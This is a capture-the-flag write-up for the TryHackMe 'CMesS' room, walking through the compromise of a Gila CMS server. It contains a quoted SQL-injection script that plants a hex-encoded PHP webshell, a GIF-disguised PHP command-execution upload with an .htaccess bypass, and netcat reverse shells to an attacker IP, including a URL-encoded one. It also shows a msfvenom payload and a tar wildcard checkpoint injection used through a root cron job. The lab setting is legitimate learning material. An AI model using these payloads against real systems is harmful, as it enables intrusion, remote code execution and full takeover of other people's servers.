13 minutes
TryHackMe - CMesS Room
Before we begin, you can access this room by creating an account with tryhackme.com and browsing to this link to join it, or by simply searching for “CMesS” under the Hacktivities tab.
Reconnaissance
- blog powered by Gila CMS
- might be running a version released back in 2017 as per the copyright claim
- doesn’t leak any username via blog posts
- doesn’t leak anything via source code
Scanning & Enumeration
Running nmap to find open ports
# Nmap 7.80 scan initiated Mon Jul 27 19:33:41 2020 as: nmap -sV -sC -oA nmap/top1000 -vv 10.10.84.254
Nmap scan report for 10.10.84.254
Host is up, received syn-ack (0.100s latency).
Scanned at 2020-07-27 19:33:41 BST for 14s
Not shown: 998 closed ports
Reason: 998 conn-refused
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvfxduhH7oHBPaAYuN66Mf6eL6AJVYqiFAh6Z0gBpD08k+pzxZDtbA3cdniBw3+DHe/uKizsF0vcAqoy8jHEXOOdsOmJEqYXjLJSayzjnPwFcuaVaKOjrlmWIKv6zwurudO9kJjylYksl0F/mRT6ou1+UtE2K7lDDiy4H3CkBZALJvA0q1CNc53sokAUsf5eEh8/t8oL+QWyVhtcbIcRcqUDZ68UcsTd7K7Q1+GbxNa3wftE0xKZ+63nZCVz7AFEfYF++glFsHj5VH2vF+dJMTkV0jB9hpouKPGYmxJK3DjHbHk5jN9KERahvqQhVTYSy2noh9CBuCYv7fE2DsuDIF
| 256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGOVQ0bHJHx9Dpyf9yscggpEywarn6ZXqgKs1UidXeQqyC765WpF63FHmeFP10e8Vd3HTdT3d/T8Nk3Ojt8mbds=
| 256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFUGmaB6zNbqDfDaG52mR3Ku2wYe1jZX/x57d94nxxkC
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Gila CMS
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 3 disallowed entries
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 27 19:33:55 2020 -- 1 IP address (1 host up) scanned in 14.11 seconds
- 2 ports open
- HTTP
- SSH
- /src/ /themes/ /lib/ disallowed in robots.txt
- Apache version 2.4.18 released somewhere in 2018
- latest apache version 2.4.43 as of now
- some high vulnerabilities in this version: link
Note: running nmap with the -p- switch returns no other open ports
Searching metasploit for known exploits for Gila CMS
searchsploit 'Gila CMS'
------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------
Gila CMS 1.11.8 - 'query' SQL Injection | php/webapps/48590.py
Gila CMS 1.9.1 - Cross-Site Scripting | php/webapps/46557.txt
Gila CMS < 1.11.1 - Local File Inclusion | multiple/webapps/47407.txt
------------------------------------------------------------------------------------------------------------------------------------------------------
- got a python script that can perform SQL injection on gila 1.11.8
import requests as req
import time as vremeto
import sys as sistemot
import re as regularno
if len(sistemot.argv) < 2:
print("Usage: ./CVE_2020_5515.py ip:port")
sistemot.exit(19)
else:
ip = sistemot.argv[1]
cookies = {'PHPSESSID': 'lcvp6aig6pg1dlq8coh44e8sq1', 'GSESSIONID': '21k2mbxockr9sf1v1agxkwpkt6ruzdl6vjz6fgmt7s0e72hlas'}
webpath = "/gila-1.11.8/admin/sql?query="
query1 = "SELECT id FROM user LIMIT 0,1 INTO OUTFILE "
localpath = "\'C://xampp//htdocs//"
shellname = "webshell.php\' "
query2 = "LINES TERMINATED BY "
print("[*] Injecting ")
cmdphp = "0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297"
cmdphp += "b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d"
cmdphp += "2824636d64293b206563686f20273c2f7072653e24636d643c7072653e273b2064696"
cmdphp += "53b207d203f3e"
url = 'http://' + ip + webpath + query1 + localpath + shellname + query2 + cmdphp
r = req.get(url, cookies=cookies)
vremeto.sleep(1)
print("[*] Executing")
r = req.get("http://" + ip + "/" + shellname + "?cmd=whoami")
print("You have a webshell in http://" + ip + "/" + shellname + "?cmd=command")
- running it we get the print saying we got a shell code but when attempting to run commands nothing happens, it appears the website is not vulnerable to this attack
Testing for SQL injection with sqlmap
sqlmap -r login.req --level 5 --risk 3 --threads 10
Output returns not injectable.
Running nikto to scan the website for vulnerabilities
nikto -h cmess.thm -o nikto.txt
- Nikto v2.1.6/2.1.5
+ Target Host: cmess.thm
+ Target Port: 80
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET "robots.txt" contains 3 entries which should be manually viewed.
+ HEAD Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ UNMYUKLM Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ GET Cookie PHPSESSID created without the httponly flag
+ GET /admin/config.php: PHP Config file may contain database IDs and passwords.
+ GET /admin/cplogfile.log: DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version.
+ GET /admin/system_footer.php: myphpnuke version 1.8.8_final_7 reveals detailed system information.
+ OSVDB-3233: GET /admin/admin_phpinfo.php4: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ OSVDB-5034: GET /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-376: GET /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-4804: GET //admin/admin.shtml: Axis network camera may allow admin bypass by using double-slashes before URLs.
+ OSVDB-2813: GET /admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
+ OSVDB-2842: GET //admin/aindex.htm: FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra '/'. http://packetstorm.linuxsecurity.com/0310-exploits/FlexWATCH.txt
+ OSVDB-2922: GET /admin/wg_user-info.ml: WebGate Web Eye exposes user names and passwords.
+ OSVDB-3092: GET /admin/: This might be interesting...
+ OSVDB-3092: GET /login/: This might be interesting...
+ OSVDB-3093: GET /admin/auth.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/cfg/configscreen.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/cfg/configsite.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/cfg/configsql.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/cfg/configtache.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/cms/htmltags.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/credit_card_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/exec.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/modules/cache.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/objects.inc.php4: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/script.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/settings.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/templates/header.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /admin/upload.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-4238: GET /admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected.
+ OSVDB-4239: GET /admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected.
+ OSVDB-6666: GET /cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS.
+ OSVDB-9624: GET /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ OSVDB-3092: GET /fm/: This might be interesting... potential country code (Federated States Of Micronesia)
+ GET /admin/account.asp: Admin login page/section found.
+ GET /admin/account.html: Admin login page/section found.
+ GET /admin/account.php: Admin login page/section found.
+ GET /admin/controlpanel.asp: Admin login page/section found.
+ GET /admin/controlpanel.html: Admin login page/section found.
+ GET /admin/controlpanel.php: Admin login page/section found.
+ GET /admin/cp.asp: Admin login page/section found.
+ GET /admin/cp.html: Admin login page/section found.
+ GET /admin/cp.php: Admin login page/section found.
+ GET /admin/home.asp: Admin login page/section found.
+ GET /admin/home.php: Admin login page/section found.
+ GET /admin/index.asp: Admin login page/section found.
+ GET /admin/index.html: Admin login page/section found.
+ GET /admin/login.asp: Admin login page/section found.
+ GET /admin/login.html: Admin login page/section found.
+ GET /admin/login.php: Admin login page/section found.
+ GET /admin/html: Tomcat Manager / Host Manager interface found (pass protected)
+ GET /admin/status: Tomcat Server Status interface found (pass protected)
+ GET /admin/sites/new: ComfortableMexicanSofa CMS Engine Admin Backend (pass protected)
- tested all OSVDB vulnerabilities, no luck in bypassing the admin page
Running gobuster to brute-force website directory paths
gobuster dir -u http://cmess.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.out
/index (Status: 200)
/about (Status: 200)
/search (Status: 200)
/blog (Status: 200)
/1 (Status: 200)
/01 (Status: 200)
/login (Status: 200)
/category (Status: 200)
/0 (Status: 200)
/feed (Status: 200)
/themes (Status: 301)
/admin (Status: 200)
/assets (Status: 301)
/tag (Status: 200)
/author (Status: 200)
/Search (Status: 200)
/sites (Status: 301)
/About (Status: 200)
/log (Status: 301)
/Index (Status: 200)
/tags (Status: 200)
/1x1 (Status: 200)
/lib (Status: 301)
/src (Status: 301)
/api (Status: 200)
/001 (Status: 200)
/1pix (Status: 200)
/fm (Status: 200)
/tmp (Status: 301)
/1a (Status: 200)
/0001 (Status: 200)
/1x1transparent (Status: 200)
/INDEX (Status: 200)
/1px (Status: 200)
/1d (Status: 200)
/1_1 (Status: 200)
/Author (Status: 200)
/1pixel (Status: 200)
/0001-exploits (Status: 200)
/01_hello (Status: 200)
/1-1 (Status: 200)
/1st (Status: 200)
/Category (Status: 200)
/00000001 (Status: 200)
/1X1 (Status: 200)
/1x1_spacer (Status: 200)
/1b (Status: 200)
/1s (Status: 200)
/1f (Status: 200)
/1h (Status: 200)
/1x1trans (Status: 200)
/00001 (Status: 200)
/1click (Status: 200)
/1_2006 (Status: 200)
/1_2007 (Status: 200)
/1c (Status: 200)
/000001 (Status: 200)
/1by1 (Status: 200)
/Feed (Status: 200)
/1ptrans (Status: 200)
/SEARCH (Status: 200)
/1-2 (Status: 200)
/1tr (Status: 200)
/1_3 (Status: 200)
/1e (Status: 200)
/1star (Status: 200)
/1stars-sFFDD81 (Status: 200)
/1x1black (Status: 200)
/1x1t (Status: 200)
/1x1spacer (Status: 200)
/01topics (Status: 200)
/1A (Status: 200)
/1_2 (Status: 200)
/01-02 (Status: 200)
/1x (Status: 200)
/1_0 (Status: 200)
/1pxinv (Status: 200)
/1stars (Status: 200)
- found the admin and login pages
- the paths highlighted in robots.txt are inaccessible - unauthorized
- the rest are not of much help at this moment
Running wfuzz to fuzz for subdomains
wfuzz -c -f wfuzz.out -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hw 290
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://cmess.thm/
Total requests: 4997
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000019: 200 30 L 104 W 934 Ch "dev"
Total time: 57.14272
Processed Requests: 4997
Filtered Requests: 4996
Requests/sec.: 87.44770
- found dev subdomain. Let’s add it to /etc/hosts
Development Log
andre@cmess.thm
Have you guys fixed the bug that was found on live?
support@cmess.thm
Hey Andre, We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!
support@cmess.thm
Update! We have had to delay the patch due to unforeseen circumstances
andre@cmess.thm
That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.
support@cmess.thm
Your password has been reset. Here: XXXXXXXXX
- got a username and password for the admin page
- misconfigured .htaccess file that we can potentially exploit
Gaining Access
Using the credentials found on dev, we can log in on the admin portal where we also find the CMS version currently running (1.10.9)
- we can also get the PHP version: PHP Version 7.0.33-0ubuntu0.16.04.9
- content > file manager gives us access to the .htaccess file
# 3 MONTHS - unlikely to be changed
<IfModule mod_headers.c>
<FilesMatch "\.(css|js|jpg|jpeg|png|gif|webp)$">
Header set Cache-Control "max-age=2592000, public"
</FilesMatch>
</IfModule>
<IfModule mod_gzip.c>
mod_gzip_on Yes
mod_gzip_dechunk Yes
mod_gzip_item_include file \.(html?|txt|css|js|php|pl|jpg|png|gif)$
</IfModule>
RewriteEngine On
# exclude these folders
RewriteCond %{REQUEST_URI} !/vendor/
RewriteCond %{REQUEST_URI} !/src/
RewriteCond %{REQUEST_URI} !/themes/
RewriteCond %{REQUEST_URI} !/lib/
RewriteCond %{REQUEST_URI} !/assets/
RewriteCond %{REQUEST_URI} !/tmp/
RewriteCond %{REQUEST_URI} !robots.txt
# dont list folder contents
IndexIgnore *
RewriteRule (.*)$ index.php?url=$1 [QSA,L]
# enforce https redirection
# RewriteCond %{HTTPS} off
# RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
# redirect all sites
# RewriteCond %{HTTP_HOST} ^(.*)$ [NC]
# RewriteCond %{HTTP_HOST} !^localhost$ [NC]
# RewriteRule ^assets/(.*)$ sites/%{HTTP_HOST}/assets/$1 [NC]
# RewriteRule ^tmp/(.*)$ sites/%{HTTP_HOST}/tmp/$1 [NC]
Googling around, I found this post on github which explains a file upload filter bypass vulnerability which can allow us to execute code remotely on the server - https://github.com/GilaCMS/gila/pull/49
To do so, follow the below steps:
touch test.gif
echo 'GIF89a; <?=\`\$_GET[1]\`?>' > test.gif
Next, upload the GIF file in Admin > Content > Media and press the N looking button to move it to tmp/media_thumb/rev.php
Now that we have successfully uploaded a PHP file on the server, we need to allow execution of such files as currently this is blocked.
Browse http://cmess.thm/admin/fm?f=tmp/.htaccess and edit the file like shown:
You will now be able to browse to cmess.thm/tmp/media_thumb/rev.php?1= and run arbitrary code such as cmess.thm/tmp/media_thumb/rev.php?1=cat /etc/passwd
Let’s get a reverse shell. First, we need to find a suitable reverse shell payload. I found this to work just fine:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.12.168 9001 >/tmp/f
Afterwards, we need to set up a listener locally and url encode the payload in order for it to execute successfully. I have used Burp decoder/encoder to URL encode it:
%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%31%2e%31%32%2e%31%36%38%20%39%30%30%31%20%3e%2f%74%6d%70%2f%66
Finally, running the below will grant us a reverse shell:
cmess.thm/tmp/media_thumb/rev.php?1=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%31%2e%31%32%2e%31%36%38%20%39%30%30%31%20%3e%2f%74%6d%70%2f%66
Privesc
www-data to andre
Now that we got foothold, I have started looking for privesc opportunities by running linPEAS to further enumerate the box.
Found a backup file:
/tmp/andre_backup.tar.gz
*/2 * * * * root cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *
A few other interesting details:
[+] Superusers
root❌0:0:root:/root:/bin/bash
[+] Users with console
andre❌1000:1000:andre,,,:/home/andre:/bin/bash
root❌0:0:root:/root:/bin/bash
I have noticed that python3 is installed, and I have started a HTTP server just to get andre_backup.tar.gz to my kali machine. The backup file contains a note reading: Note to self. Anything in here will be backed up!
Unfortunately, we do not have access to write to /home nor are we able to browse to andre’s home folder.
In /tmp/ we can only read the archive. Checking /etc/crontab we can see the cron job running every 30 seconds, however, we do not have access to modify it.
Let’s enumerate the box again using linenum.sh with the -t param for through testing:
./ls.sh -t
[-] Files not owned by user but writable by group:
-rwxrwxrwx 1 root root 36 Feb 6 18:54 /opt/.password.bak
Cool, we found a password.bak file that we have full access to.
www-data@cmess:/var/www/html/xpl0it$ cat /opt/.password.bak
andres backup password
[REDACTED]
andre to root
We can now use the password found in the backup file to ssh into the box as andre:
ssh andre@cmess.thm
The authenticity of host 'cmess.thm (10.10.80.171)' can't be established.
ECDSA key fingerprint is SHA256:sWfTNeZtMkhHDii33U60/cvVhAonkgxNTMtJ+KYQ7bI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cmess.thm,10.10.80.171' (ECDSA) to the list of known hosts.
andre@cmess.thm's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Thu Feb 13 15:02:43 2020 from 10.0.0.20
andre@cmess:~$
We’re in as Andre. Great! We need to run the enum scripts again to see what else we can do:
[+] PATH
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#usdpath
/home/andre/bin:/home/andre/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
New path exported: /home/andre/bin:/home/andre/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp ---> HP-UX_10.20
/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
/usr/bin/chfn ---> SuSE_9.3/10
/usr/bin/sudo ---> /sudo$
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ntfs-3g ---> Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
/bin/fusermount
/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/ping6
/bin/su
/bin/ping
/bin/umount ---> BSD/Linux(08-1996)
[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/bin/expiry
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/wall
/usr/bin/crontab
/usr/bin/bsd-write
/usr/bin/mlocate
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
Checking SGID/SUID and running sudo -l we can see that we’re not in the sudoers file and can’t do much. However, during our initial enumeration we found a crontab job that’s backing up Andre’s backup directory:
*/2 * * * * root cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *
The problem with this, is that it has a wildcard at the end which can be exploited to gain a shell as the user that’s running the job, in our case root. A great blog post explaining the whole process can be found here.
andre@cmess:~$ cd backup/
andre@cmess:~$ chmod 777 backup/
Generate a reverse shell payload with MSF locally and start a netcat listener:
msfvenom -p cmd/unix/reverse_netcat lhost=tun0 lport=9001 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 90 bytes
mkfifo /tmp/jwhd; nc 10.11.12.168 9001 0</tmp/jwhd | /bin/sh >/tmp/jwhd 2>&1; rm /tmp/jwhd
nc -lvnp 9001
Run the following on the victim machine:
echo "mkfifo /tmp/jwhd; nc 10.11.12.168 9001 0</tmp/jwhd | /bin/sh >/tmp/jwhd 2>&1; rm /tmp/jwhd" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
On the next job run, you will get a reverse shell as the user running the crontab job
